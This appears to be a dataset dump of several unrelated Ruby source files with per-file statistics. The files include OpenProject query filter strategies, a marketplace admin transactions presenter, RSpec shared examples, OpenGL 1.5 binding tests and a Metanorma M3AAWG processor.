# Copyright (C) 2012-2020 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
module Queries::Filters::Strategies
# Base class for query filter value strategies: wraps a filter and maps
# its operator symbols onto operator classes. Subclasses configure
# supported_operators / default_operator.
class BaseStrategy
attr_accessor :filter
class_attribute :supported_operators,
:default_operator
delegate :values,
:errors,
to: :filter
def initialize(filter)
self.filter = filter
end
# Hook for subclasses; no-op by default.
def validate; end
# The operator class matching the filter's current operator symbol,
# restricted to the operators this strategy supports.
def operator
operator_map
.slice(*self.class.supported_operators)[filter.operator]
end
# Hook for subclasses; no-op by default.
def valid_values!; end
# All supported operator classes, in declaration order.
def supported_operator_classes
operator_map
.slice(*self.class.supported_operators)
.map(&:last)
.sort_by { |o| self.class.supported_operators.index o.symbol.to_s }
end
# NOTE(review): `available_operators` is not defined in this class —
# presumably provided by subclasses or a mixin; confirm.
def default_operator_class
operator = self.class.default_operator || self.class.available_operators.first
operator_map[operator]
end
private
# Symbol -> operator class registry shared by all strategies.
def operator_map
::Queries::Operators::OPERATORS
end
end
end
| 28.905405 | 91 | 0.713885 |
e97657c6612ca704bf656183d32afec7e4c225de | 977 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Arrow
  # Full version string, including any pre-release tag.
  VERSION = "0.16.0-SNAPSHOT"

  # Version broken out into numeric components and pre-release tag.
  module Version
    release_part, TAG = VERSION.split("-")
    MAJOR, MINOR, MICRO = release_part.split(".").map(&:to_i)
    STRING = VERSION
  end
end
| 36.185185 | 62 | 0.746162 |
7ab53da39875aaec41d9223df1230f880a010fdd | 125 | class Category < ApplicationRecord
# Join-model association backing the Ad <-> Category relationship.
has_many :ad_has_categories
# FIX: ':throught' was a typo — Rails rejects unknown association option
# keys (ArgumentError at class load), so this association never worked.
# The correct option is :through.
has_many :ads, through: :ad_has_categories
end
| 20.833333 | 52 | 0.752 |
f75e01d9d048367be0b37b2108efa24cd7fd4f4b | 905 | shared_examples "a protected admin controller" do |controller|
# url_for arguments targeting the admin host for the given controller.
let(:args) do
{
host:Rails.application.config.baukis2[:admin][:host],
controller: controller
}
end
describe "#index" do
# "Redirects to the login form"
example "ログインフォームにリダイレクト" do
get url_for(args.merge(action: :index))
expect(response).to redirect_to(admin_login_url)
end
end
describe "#show" do
# "Redirects to the login form"
example "ログインフォームにリダイレクト" do
get url_for(args.merge(action: :show, id:1))
expect(response).to redirect_to(admin_login_url)
end
end
end
# Shared example group: a singular (no :id) admin resource must redirect
# anonymous visitors to the login form.
shared_examples "a protected singular admin controller" do |controller|
  # url_for arguments targeting the admin host for the given controller.
  let(:args) do
    {
      host: Rails.application.config.baukis2[:admin][:host],
      controller: controller
    }
  end

  # FIX: 'desribe' was a typo for 'describe' — including this shared
  # example group raised NoMethodError, so the example never ran.
  describe "show" do
    # "Redirects to the login form"
    example "ログインフォームにリダイレクト" do
      get url_for(args.merge(action: :show))
      expect(response).to redirect_to(admin_login_url)
    end
  end
end
0388dea5adb39d665cda59c41ce80d3616e25fa0 | 6,349 | class Admin2::TransactionsPresenter
# Presenter for the admin transactions screens: wraps a service exposing
# transactions/transaction/community and derives display values.
include Collator
private
attr_reader :service
public
def initialize(params, service)
@params = params
@service = service
end
delegate :transactions, :transaction, :community, to: :service, prefix: false
# Transaction states offered in the status filter dropdown.
FILTER_STATUSES = %w[free confirmed paid canceled preauthorized rejected
payment_intent_requires_action payment_intent_action_expired
disputed refunded dismissed]
# [label-with-count, status] pairs sorted by localized label.
def sorted_statuses
statuses = FILTER_STATUSES
statuses.map {|status|
["#{I18n.t("admin2.manage_transactions.status_filter.#{status}")} (#{count_by_status(status)})", status]
}.sort_by{|translation, _status| collator.get_sort_key(translation) }
end
# Count of transactions in a given state (or all, when status is nil).
# unscope drops any state filter already applied to the service scope.
def count_by_status(status = nil)
scope = service.transactions_scope.unscope(where: :current_state)
if status.present?
scope.where(current_state: status).count
else
scope.count
end
end
def has_search?
@params[:q].present? || @params[:status].present?
end
# Link to the transaction details only when it has progressed past
# pending/expired payment-intent states.
def show_link?(tx)
exclude = %w[pending payment_intent_requires_action payment_intent_action_expired]
!exclude.include?(tx.current_state)
end
# Deep link to the payment in the gateway's dashboard.
def link_payment
case service.transaction.payment_gateway
when :stripe
"https://dashboard.stripe.com/search?query=#{service.transaction.id}"
when :paypal
'https://www.paypal.com/signin'
end
end
def text_link_payment
case service.transaction.payment_gateway
when :stripe
I18n.t('admin2.manage_transactions.view_in_stripe', id: service.transaction.id)
when :paypal
I18n.t('admin2.manage_transactions.view_in_paypal', id: service.transaction.id)
end
end
def show_commission_info?
return false unless service.transaction.payment_gateway == :paypal
PaypalPayment.find_by(transaction_id: transaction.id)&.commission_status == 'seller_is_admin'
end
def listing_title
transaction.listing_title
end
def localized_unit_type
transaction.unit_type.present? ? ListingViewUtils.translate_unit(transaction.unit_type, transaction.unit_tr_key) : nil
end
def localized_selector_label
transaction.unit_type.present? ? ListingViewUtils.translate_quantity(transaction.unit_type, transaction.unit_selector_tr_key) : nil
end
# True when the transaction has a booking attached.
def booking
!!transaction.booking
end
def booking_per_hour
transaction.booking&.per_hour
end
def quantity
transaction.listing_quantity
end
def show_subtotal
!!transaction.booking || quantity.present? && quantity > 1 || transaction.shipping_price.present?
end
def payment
@payment ||= TransactionService::Transaction.payment_details(transaction)
end
def listing_price
transaction.unit_price
end
def start_on
booking ? transaction.booking.start_on : nil
end
def end_on
booking ? transaction.booking.end_on : nil
end
def duration
booking ? transaction.listing_quantity : nil
end
def subtotal
show_subtotal ? transaction.item_total : nil
end
def total
transaction.payment_total || payment[:total_price]
end
# Payout to the seller: total minus both commissions.
def seller_gets
total - transaction.commission - transaction.buyer_commission
end
def fee
transaction.commission
end
def shipping_price
transaction.shipping_price
end
def unit_type
transaction.unit_type
end
def start_time
booking_per_hour ? transaction.booking.start_time : nil
end
def end_time
booking_per_hour ? transaction.booking.end_time : nil
end
def buyer_fee
transaction.buyer_commission
end
def has_buyer_fee
buyer_fee.present? && buyer_fee.positive?
end
def has_provider_fee
fee.present? && fee.positive?
end
# Sum of provider and buyer commissions (nil-safe via compact).
def marketplace_collects
[fee, buyer_fee].compact.sum
end
# Conversation messages interleaved with state transitions, newest first.
def messages_and_actions
@messages_and_actions ||= TransactionViewUtils.merge_messages_and_transitions(
TransactionViewUtils.conversation_messages(transaction.conversation.messages, community.name_display_type),
TransactionViewUtils.transition_messages(transaction, transaction.conversation, community)).reverse
end
def preauthorized?
transaction.current_state == 'preauthorized'
end
def paid?
transaction.current_state == 'paid'
end
def disputed?
transaction.current_state == 'disputed'
end
def show_next_step?
preauthorized? || paid? || disputed?
end
def buyer
transaction.starter
end
# 'X' is the placeholder shown when the person record is missing.
def buyer_name
buyer ? PersonViewUtils.person_display_name(buyer, community) : 'X'
end
def provider
transaction.author
end
def provider_name
provider ? PersonViewUtils.person_display_name(provider, community) : 'X'
end
def completed?
%w[confirmed canceled refunded].include?(transaction.current_state)
end
def shipping?
transaction.delivery_method == 'shipping'
end
def pickup?
transaction.delivery_method == 'pickup'
end
# Formatted one-line shipping address, or nil when the transaction has
# no usable address data. Memoized (including a memoized nil).
def shipping_address
  return @shipping_address if defined?(@shipping_address)

  @shipping_address = nil
  fields = %i[name phone street1 street2 postal_code city state_or_province country]
  if transaction.shipping_address
    address = transaction.shipping_address.slice(*fields)
    if address.values.any?
      # FIX: this previously called `shipping_address[:country_code]`,
      # re-entering this method while @shipping_address was still nil and
      # raising NoMethodError whenever the country name was blank. The
      # country code lives on the raw transaction address.
      address[:country] ||= CountryI18nHelper.translate_country(transaction.shipping_address[:country_code])
      @shipping_address = fields.map { |field| address[field] }.select(&:present?).join(', ')
    end
  end
  @shipping_address
end
def show_transactions_export?
!personal? && !has_search?
end
def personal?
service.personal
end
# NOTE(review): the conversation list is rebuilt before the memoization
# check, so the ||= only skips the final view-model mapping — confirm
# whether that is intentional.
def conversations_with_buyer
convs_service = conversations_service(buyer_name)
conversations = convs_service.conversations.reverse
@conversations_with_buyer ||= ConversationViewUtils.conversations(conversations, community, convs_service).reverse
end
def conversations_with_seller
convs_service = conversations_service(provider_name)
conversations = convs_service.conversations.reverse
@conversations_with_seller ||= ConversationViewUtils.conversations(conversations, community, convs_service).reverse
end
# Conversation listing service scoped to conversations involving the
# named person.
def conversations_service(for_person)
params = {
sort: "started",
page: 1,
q: for_person
}
Admin2::ConversationsService.new(
community: community,
params: params)
end
end
| 24.049242 | 135 | 0.735076 |
7a22bced12009480ffb8c5e143cc914769e8cdf6 | 1,283 | # frozen_string_literal: true
module ReleaseTools
module TraceSection
# Run the block inside a collapsed GitLab CI trace section titled with
# `summary` (optionally prefixed by `icon`); returns the block's value.
def self.collapse(summary, icon: nil)
title =
if icon
"#{icon} #{summary}"
else
summary
end
section = section_name(summary)
# CI trace protocol: section_start:<unix-ts>:<name>[collapsed=true]
puts "section_start:#{Time.now.to_i}:#{section}[collapsed=true]\r\e[0K#{title}"
ret = yield
close(section)
ret
rescue StandardError => ex
close(section)
# If we don't handle the error, it's displayed within the collapsed
# section, which can be confusing. Handling the error allows us to close
# the section first, and display it outside of the section.
puts "❌ The section #{summary.inspect} produced an error:".colorize(:red)
raise ex
end
# Emit the CI trace marker that ends the named section.
def self.close(section)
# Flush any output so we capture it in the section, instead of it being
# buffered and displayed outside of the section.
#
# We flush here so that for both the happy and error path we flush the
# output first.
$stdout.flush
$stderr.flush
SemanticLogger.flush
puts "section_end:#{Time.now.to_i}:#{section}\r\e[0K"
end
# Derive a CI-safe section identifier from a human-readable summary:
# lowercased, whitespace runs become underscores, colons become dashes.
def self.section_name(summary)
  summary.downcase.gsub(/\s+/, '_').tr(':', '-')
end
end
end
| 26.183673 | 85 | 0.624318 |
5db14bd19cd351e4b937c82881ce2728b701054f | 1,458 | module Pokotarou
module RegistrationConfigMaker
class ConfigDomain
class << self
# Predicates reporting which optional syntaxes a parsed config hash
# contains. All treat blank content as "not present". The :"...'" keys
# are the trailing-quote ("dush") variants of the option names.
def has_dush_import_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"import'")
end
def has_dush_template_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"template'")
end
def has_dush_template_path_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"template_path'")
end
def has_dush_preset_path_syntax? all_content
return false if all_content.blank?
return all_content.has_key?(:"preset_path'")
end
def has_grouping_syntax? model_content
return false if model_content.blank?
return model_content.has_key?(:grouping)
end
def has_template_syntax? model_content
return false if model_content.blank?
return model_content.has_key?(:template)
end
def has_seed_data_syntax? col_config, col_name_sym
return false if col_config.blank?
return col_config.has_key?(col_name_sym)
end
# Matches values ending in a single quote (the "dush" option marker).
# NOTE(review): ^/$ anchor per-line, so a multiline string whose first
# line ends in a quote also matches — confirm whether \A/\z was intended.
DUSH_OPTION_REGEX = /^.*\'$/
# True when the value uses the trailing-quote ("dush") syntax.
# FIX: previously returned a MatchData index (Integer) or nil; a
# ?-suffixed predicate should return a real boolean. Truthiness is
# unchanged for existing callers.
def is_dush_syntax? syntax
  return false unless syntax.kind_of?(String)
  DUSH_OPTION_REGEX.match?(syntax)
end
end
end
end
end | 30.375 | 58 | 0.635802 |
1cabd5de2379ab624e7b1ef368ee5ad0d3c65603 | 88 | json.partial! 'operating_systems/operating_system', operating_system: @operating_system
| 44 | 87 | 0.863636 |
ed93be34f67f0e7a6375b98aff47ce4d79fd2aac | 2,201 | INPUT = 'input.txt'
# Parse the bingo input: first line is the comma-separated draw order,
# followed by blank-line-separated 5x5 boards.
@numbers = Array.new
@boards = Array.new
file_lines = File.readlines(INPUT)
@numbers = file_lines.shift.chomp.split(',').collect(&:to_i)
board = nil
row = 0
file_lines.each do |line|
# A blank line finishes the current board and starts a new one.
if line.chomp == ''
@boards << board if board
board = Hash.new
row = 0
next
end
board[:cols] ||= Hash.new
board[:rows] ||= Hash.new
board[:winner] = false
board[:won_at] = nil
board[:win_number_order] = nil
line.chomp.split(' ').each_with_index do |number, index|
# Each cell hash is shared between its row and its column, so
# marking it once marks it everywhere.
position = Hash.new
position[:number] = number.to_i
position[:chosen] = false
board[:cols][index] ||= Array.new
board[:cols][index] << position
board[:rows][row] ||= Array.new
board[:rows][row] << position
end
row += 1
end
@boards << board
# Mark the board cell as chosen when it holds the drawn number.
# Returns the cell's (possibly just-updated) chosen flag.
def process_position(position, number)
  position[:chosen] = true if position[:number] == number
  position[:chosen]
end
# A row/column wins when every one of its cells has been chosen.
def check_win(position_array)
  position_array.all? { |pos| pos[:chosen] == true }
end
# Play every drawn number against every board, recording for each board
# the number and draw index at which it first won; finished boards are
# skipped on later draws.
@numbers.each_with_index do |number, index|
#find the number in each board
@boards.each do |board|
next if board[:winner]
board[:cols].each do |col_idx, position_arr|
position_arr.each do |position|
if process_position(position, number)
if check_win(board[:cols][col_idx])
board[:winner] = true
board[:won_at] = number
board[:win_number_order] = index
end
end
end
end
board[:rows].each do |row_idx, position_arr|
position_arr.each do |position|
if process_position(position, number)
if check_win(board[:rows][row_idx])
board[:winner] = true
board[:won_at] = number
board[:win_number_order] = index
end
end
end
end
end
end
# Part 2: the board that wins LAST (highest draw index).
# NOTE(review): assumes every board eventually wins — a board that never
# wins keeps win_number_order nil and would make this comparison raise.
@winning_board = @boards.max{|a, b| a[:win_number_order] <=> b[:win_number_order]}
pp @winning_board
#score it
# Score = sum of all unmarked numbers times the winning draw.
unmarked_score = @winning_board[:rows].reduce(0) do |acc, row|
position_arr = row[1]
losers = position_arr.select{|pos| pos[:chosen] == false}
acc += losers.sum{|pos| pos[:number]}
end
pp unmarked_score * @winning_board[:won_at]
7967ff81075feae78126269ff1c2693c19582752 | 1,188 | # frozen_string_literal: true
require 'spec_helper'
describe ProtectedBranches::UpdateService do
let(:protected_branch) { create(:protected_branch) }
let(:project) { protected_branch.project }
let(:user) { project.owner }
let(:params) { { name: 'new protected branch name' } }
describe '#execute' do
subject(:service) { described_class.new(project, user, params) }
it 'updates a protected branch' do
result = service.execute(protected_branch)
expect(result.reload.name).to eq(params[:name])
end
# Non-owner users must not be able to update protection rules.
context 'without admin_project permissions' do
let(:user) { create(:user) }
it "raises error" do
expect { service.execute(protected_branch) }.to raise_error(Gitlab::Access::AccessDeniedError)
end
end
# Even a permitted user is blocked when the policy object denies access.
context 'when a policy restricts rule creation' do
before do
policy = instance_double(ProtectedBranchPolicy, can?: false)
expect(ProtectedBranchPolicy).to receive(:new).and_return(policy)
end
it "prevents creation of the protected branch rule" do
expect { service.execute(protected_branch) }.to raise_error(Gitlab::Access::AccessDeniedError)
end
end
end
end
| 29.7 | 102 | 0.695286 |
ac1956275c79351118b7ef9715b535a61a38e8fa | 456 | RSpec.shared_examples 'new record attributes' do
# Including specs must define `object` (the created record) and
# `attributes` (the hash the record was built from).
it 'has a name' do
expect(object.name).to eq attributes[:name]
end
it 'has a description' do
expect(object.description).to eq attributes[:description]
end
it 'has a short description' do
expect(object.short_description).to eq attributes[:short_description]
end
it 'has submission details' do
expect(object.submission_details).to eq attributes[:submission_details]
end
end
| 25.333333 | 75 | 0.743421 |
bb671c4ae4dbcaa5922ab5942b031c99ae829574 | 7,673 | #
# Copyright (C) 2007 Jan Dvorak <[email protected]>
#
# This program is distributed under the terms of the MIT license.
# See the included MIT-LICENSE file for the terms of this license.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
require 'opengl/test_case'
# Exercises the OpenGL 1.5 API bindings: occlusion queries, vertex buffer
# objects (VBOs), and buffer-backed client-state arrays. Each test drives
# real GL state, so statement order is significant throughout.
class TestGl15 < OpenGL::TestCase
def setup
super
# Skip the whole case unless the context reports GL >= 1.5.
supported? 1.5
end
# Occlusion query lifecycle: gen, begin, draw, end, poll result, delete.
def test_query
queries = glGenQueries 2
assert_equal 2, queries.length
glBeginQuery GL_SAMPLES_PASSED, queries[1]
assert glIsQuery(queries[1])
glBegin GL_TRIANGLES do
glVertex2i 0, 0
glVertex2i 1, 0
glVertex2i 1, 1
end
assert_equal queries[1], glGetQueryiv(GL_SAMPLES_PASSED, GL_CURRENT_QUERY)
glEndQuery GL_SAMPLES_PASSED
r = glGetQueryObjectiv queries[1], GL_QUERY_RESULT_AVAILABLE
assert(r == GL_TRUE || r == GL_FALSE)
if r == GL_TRUE
assert_operator 0, :<=, glGetQueryObjectiv(queries[1], GL_QUERY_RESULT)[0]
assert_operator 0, :<=, glGetQueryObjectuiv(queries[1], GL_QUERY_RESULT)[0]
end
glDeleteQueries queries
refute glIsQuery queries[1]
end
# VBO data upload, sub-data update, readback and mapping.
def test_buffers
buffers = glGenBuffers(2)
glBindBuffer(GL_ARRAY_BUFFER, buffers[0])
assert glIsBuffer buffers[0]
data = [0, 1, 2, 3].pack("C*")
data2 = [4, 5, 6, 7].pack("C*")
glBufferData(GL_ARRAY_BUFFER, 4, data, GL_STREAM_READ)
assert_equal data, glGetBufferSubData(GL_ARRAY_BUFFER, 0, 4)
assert_equal GL_STREAM_READ, glGetBufferParameteriv(GL_ARRAY_BUFFER, GL_BUFFER_USAGE)
glBufferSubData(GL_ARRAY_BUFFER, 0, 4, data2)
assert_equal data2, glGetBufferSubData(GL_ARRAY_BUFFER, 0, 4)
assert_equal data2, glMapBuffer(GL_ARRAY_BUFFER, GL_READ_ONLY)
r = glUnmapBuffer(GL_ARRAY_BUFFER)
assert(r == true || r == false)
glDeleteBuffers(buffers)
refute glIsBuffer(buffers[0])
# FIXME: GetBufferPointerv not yet implemented
end
# Drawing with indices sourced from a bound GL_ELEMENT_ARRAY_BUFFER;
# feedback mode is used to count emitted vertices instead of rendering.
def test_buffer_binding_element_array
glEnableClientState(GL_VERTEX_ARRAY)
va = [0, 0, 0, 1, 1, 1].pack("f*")
glVertexPointer(2, GL_FLOAT, 0, va)
#
data = [0, 1, 2].pack("C*")
buffers = glGenBuffers(1)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, buffers[0])
glBufferData(GL_ELEMENT_ARRAY_BUFFER, 3, data, GL_DYNAMIC_DRAW)
#
feedback = glFeedbackBuffer(256, GL_3D)
glRenderMode(GL_FEEDBACK)
glDrawElements(GL_TRIANGLES, 3, GL_UNSIGNED_BYTE, 0)
glDrawRangeElements(GL_TRIANGLES, 0, 3, 3, GL_UNSIGNED_BYTE, 0)
count = glRenderMode(GL_RENDER)
assert_equal 22, count
glDisableClientState(GL_VERTEX_ARRAY)
glDeleteBuffers(buffers)
end
# Vertex data sourced from a bound GL_ARRAY_BUFFER (pointer offset 0).
def test_buffer_binding_array_1
glEnableClientState(GL_VERTEX_ARRAY)
va = [0, 0, 0, 1, 1, 1].pack("f*")
#
buffers = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, buffers[0])
glBufferData(GL_ARRAY_BUFFER, 6*4, va, GL_DYNAMIC_DRAW)
glVertexPointer(2, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_VERTEX_ARRAY_POINTER)
#
feedback = glFeedbackBuffer(256, GL_3D)
glRenderMode(GL_FEEDBACK)
glDrawElements(GL_TRIANGLES, 3, GL_UNSIGNED_BYTE, [0, 1, 2].pack("f*"))
count = glRenderMode(GL_RENDER)
assert_equal 11, count
glDeleteBuffers(buffers)
glDisableClientState(GL_VERTEX_ARRAY)
end
# Edge-flag, normal, color and texcoord arrays all sourced from VBOs,
# then verified through the current-attribute state after glArrayElement.
def test_buffer_binding_array_2
efa = [0].pack("C*")
na = [0, 1, 0].pack("f*")
ca = [1, 0, 1, 0].pack("f*")
ta = [1, 0, 1, 0].pack("f*")
buffers = glGenBuffers(4)
# load data into buffers
buffer_efa, buffer_na, buffer_ca, buffer_ta = buffers
glBindBuffer(GL_ARRAY_BUFFER, buffer_efa)
glBufferData(GL_ARRAY_BUFFER, 1, efa, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_na)
glBufferData(GL_ARRAY_BUFFER, 3*4, na, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ca)
glBufferData(GL_ARRAY_BUFFER, 4*4, ca, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ta)
glBufferData(GL_ARRAY_BUFFER, 4*4, ta, GL_DYNAMIC_DRAW)
# load buffers into arrays
glBindBuffer(GL_ARRAY_BUFFER, buffer_na)
glEdgeFlagPointer(0, 0)
assert_equal 0, glGetPointerv(GL_EDGE_FLAG_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_na)
glNormalPointer(GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_NORMAL_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ca)
glColorPointer(4, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_COLOR_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_ta)
glTexCoordPointer(4, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_TEXTURE_COORD_ARRAY_POINTER)
# not really testing index
glIndexPointer(GL_INT, 2, 0)
assert_equal 0, glGetPointerv(GL_INDEX_ARRAY_POINTER)
# draw arrays
glEnableClientState(GL_NORMAL_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
glEnableClientState(GL_TEXTURE_COORD_ARRAY)
glEnableClientState(GL_EDGE_FLAG_ARRAY)
glBegin(GL_TRIANGLES)
glArrayElement(0)
glEnd()
assert_equal [0, 1, 0], glGetDoublev(GL_CURRENT_NORMAL)
assert_equal [1, 0, 1, 0], glGetDoublev(GL_CURRENT_COLOR)
assert_equal [1, 0, 1, 0], glGetDoublev(GL_CURRENT_TEXTURE_COORDS)
assert_equal GL_FALSE, glGetBooleanv(GL_EDGE_FLAG)
glDisableClientState(GL_EDGE_FLAG_ARRAY)
glDisableClientState(GL_TEXTURE_COORD_ARRAY)
glDisableClientState(GL_COLOR_ARRAY)
glDisableClientState(GL_NORMAL_ARRAY)
glDeleteBuffers(buffers)
end
# Secondary-color and fog-coord arrays sourced from VBOs.
def test_buffer_binding_array_3
sc = [0, 1, 0].pack("f*")
fc = [1].pack("f*")
buffers = glGenBuffers(2)
# load data into buffers
buffer_sc, buffer_fc = buffers
glBindBuffer(GL_ARRAY_BUFFER, buffer_sc)
glBufferData(GL_ARRAY_BUFFER, 3*4, sc, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer_fc)
glBufferData(GL_ARRAY_BUFFER, 1*4, fc, GL_DYNAMIC_DRAW)
# load buffers into arrays
glBindBuffer(GL_ARRAY_BUFFER, buffer_sc)
glSecondaryColorPointer(3, GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_SECONDARY_COLOR_ARRAY_POINTER)
glBindBuffer(GL_ARRAY_BUFFER, buffer_fc)
glFogCoordPointer(GL_FLOAT, 0, 0)
assert_equal 0, glGetPointerv(GL_FOG_COORD_ARRAY_POINTER)
# draw arrays
glEnableClientState(GL_SECONDARY_COLOR_ARRAY)
glEnableClientState(GL_FOG_COORD_ARRAY)
glBegin(GL_TRIANGLES)
glArrayElement(0)
glEnd()
assert_equal [0, 1, 0, 1], glGetDoublev(GL_CURRENT_SECONDARY_COLOR)
assert_equal 1, glGetDoublev(GL_CURRENT_FOG_COORD)
glDisableClientState(GL_SECONDARY_COLOR_ARRAY)
glDisableClientState(GL_FOG_COORD_ARRAY)
glDeleteBuffers(buffers)
end
# glMultiDrawElements with indices from a bound element-array buffer,
# counted via feedback mode.
def test_buffer_binding_array_4
va = [0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1].pack("f*")
glVertexPointer(2, GL_FLOAT, 0, va)
glEnableClientState(GL_VERTEX_ARRAY)
buf = glFeedbackBuffer(256, GL_3D)
glRenderMode(GL_FEEDBACK)
data = [0, 1, 2, 3, 4, 5]
buffers = glGenBuffers(3)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, buffers[0])
glBufferData(GL_ELEMENT_ARRAY_BUFFER, 6, data.pack("C*"), GL_DYNAMIC_DRAW)
glMultiDrawElements(GL_TRIANGLES, GL_UNSIGNED_BYTE, [3, 3], [0, 3])
count = glRenderMode(GL_RENDER)
assert_equal 2 * (3 * 3 + 2), count
glDisableClientState(GL_VERTEX_ARRAY)
glDeleteBuffers(buffers)
end
end
| 29.398467 | 89 | 0.726443 |
b95112f9f3abd824e3fb76a5b57ce43bb6ee9e75 | 39 | module DaFace
# Gem version string.
VERSION = "0.0.12"
end
| 9.75 | 20 | 0.666667 |
ac479222b1062be6ae0160795e0b61526acedc32 | 153 | # frozen_string_literal: true
require 'test_helper'
# Rails-generated placeholder; real Attendee model tests go here.
class AttendeeTest < ActiveSupport::TestCase
# test "the truth" do
#   assert true
# end
end
| 15.3 | 44 | 0.72549 |
5d8b29acb98531ae5286abceb541b738e355903d | 998 | module ActionDispatch
module Routing
# Minimal routing DSL: translates route declarations into entries on the
# route set.
class Mapper
def initialize(route_set)
@route_set = route_set
end
# Parse the declared path and register it in the route list;
# `as` (the route name) defaults to nil.
def get(path, to:, as: nil)
# to => "controller#index"
# `to` is a "controller#action" string — split it into its two parts.
controller, action = to.split('#')
@route_set.add_route('GET', path, controller, action, as)
# p "====="
# p @route_set
end
def root(to:)
get '/', to: to, as: 'root'
end
# Expand a resource name into its index/new/show GET routes, each added
# to @route_set via #get.
def resources(plural_name)
get "/#{plural_name}", to: "#{plural_name}#index", as: plural_name.to_s
get "/#{plural_name}/new", to: "#{plural_name}#new",
as: 'new_' + plural_name.to_s.singularize
get "/#{plural_name}/show", to: "#{plural_name}#show",
as: plural_name.to_s.singularize
end
end
end
| 26.972973 | 79 | 0.519038 |
0359868c3aa90b99c8da8c73a4006f4a0038a88e | 1,418 | require "metanorma/processor"
module Metanorma
module M3AAWG
# Metanorma processor for the M3AAWG flavour: registers input/output
# formats and dispatches rendering to the IsoDoc::M3AAWG converters.
class Processor < Metanorma::Generic::Processor
# NOTE(review): returning Metanorma::Ribose's configuration from the
# M3AAWG processor looks like a copy-paste leftover — confirm whether
# Metanorma::M3AAWG.configuration was intended.
def configuration
Metanorma::Ribose.configuration
end
def initialize
# :m3d is kept as a legacy alias for the flavour.
@short = [:m3d, :m3aawg]
@input_format = :asciidoc
@asciidoctor_backend = :m3aawg
end
def output_formats
super.merge(
html: "html",
doc: "doc",
pdf: "pdf"
)
end
# Fonts required by the rendered outputs (nil = any available version).
def fonts_manifest
{
"Arial" => nil,
"Cambria Math" => nil,
"Courier New" => nil,
"EB Garamond 12" => nil,
"Overpass" => nil,
"Space Mono" => nil,
}
end
def version
"Metanorma::M3AAWG #{Metanorma::M3AAWG::VERSION}"
end
# Render the isodoc XML to the requested format; unknown formats fall
# through to the generic processor.
def output(isodoc_node, inname, outname, format, options={})
case format
when :html
IsoDoc::M3AAWG::HtmlConvert.new(options).convert(inname, isodoc_node, nil, outname)
when :doc
IsoDoc::M3AAWG::WordConvert.new(options).convert(inname, isodoc_node, nil, outname)
when :pdf
IsoDoc::M3AAWG::PdfConvert.new(options).convert(inname, isodoc_node, nil, outname)
when :presentation
IsoDoc::M3AAWG::PresentationXMLConvert.new(options).convert(inname, isodoc_node, nil, outname)
else
super
end
end
end
end
end
| 24.877193 | 104 | 0.565585 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.